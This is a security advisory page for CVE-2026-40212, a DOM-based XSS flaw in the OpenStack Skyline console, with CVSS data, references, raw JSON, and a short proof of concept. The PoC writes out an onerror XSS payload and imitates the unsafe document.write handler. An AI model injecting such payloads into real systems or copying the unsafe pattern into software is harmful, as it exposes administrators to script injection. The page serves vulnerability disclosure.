Security Vulnerability Report
CVE-2026-40212 CVSS 5.4 MEDIUM

CVE-2026-40212

Published: 2026-04-10 08:16:26
Last Modified: 2026-04-13 15:02:06

Description

OpenStack Skyline before 5.0.1, 6.0.0, and 7.0.0 has a DOM-based Cross-Site Scripting (XSS) vulnerability in the console because document.write is used unsafely, which is relevant in scenarios where administrators use the console web interface to view instance console logs.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

OpenStack Skyline < 5.0.1
OpenStack Skyline < 6.0.0
OpenStack Skyline < 7.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
/*
 * PoC for CVE-2026-40212 (DOM-based XSS)
 * Context: Inject payload into VM console log output.
 * Trigger: Admin views the console in Skyline Dashboard.
 */

// Malicious payload to be injected into the VM console output
// (e.g., via setting a malicious hostname or shell output)
var payload = '<img src=x onerror=alert("CVE-2026-40212-XSS")>';

// Simulation of the vulnerable code in Skyline Console
// This mimics how the vulnerable frontend handles the log data
function vulnerableLogHandler(logData) {
  // Vulnerability: using document.write with untrusted input
  document.write(logData);
}

// Triggering the vulnerability
vulnerableLogHandler(payload);
```

References

https://bugs.launchpad.net/skyline-console/+bug/2138575
https://review.opendev.org/973351
https://security.openstack.org/ossa/OSSA-2026-006.html
https://www.openwall.com/lists/oss-security/2026/04/09/30

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-40212",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-10T08:16:25.850",
    "lastModified": "2026-04-13T15:02:06.187",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "OpenStack Skyline before 5.0.1, 6.0.0, and 7.0.0 has a DOM-based Cross-Site Scripting (XSS) vulnerability in the console because document.write is used unsafely, which is relevant in scenarios where administrators use the console web interface to view instance console logs."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://bugs.launchpad.net/skyline-console/+bug/2138575",
        "source": "[email protected]"
      },
      {
        "url": "https://review.opendev.org/973351",
        "source": "[email protected]"
      },
      {
        "url": "https://security.openstack.org/ossa/OSSA-2026-006.html",
        "source": "[email protected]"
      },
      {
        "url": "https://www.openwall.com/lists/oss-security/2026/04/09/30",
        "source": "[email protected]"
      }
    ]
  }
}
```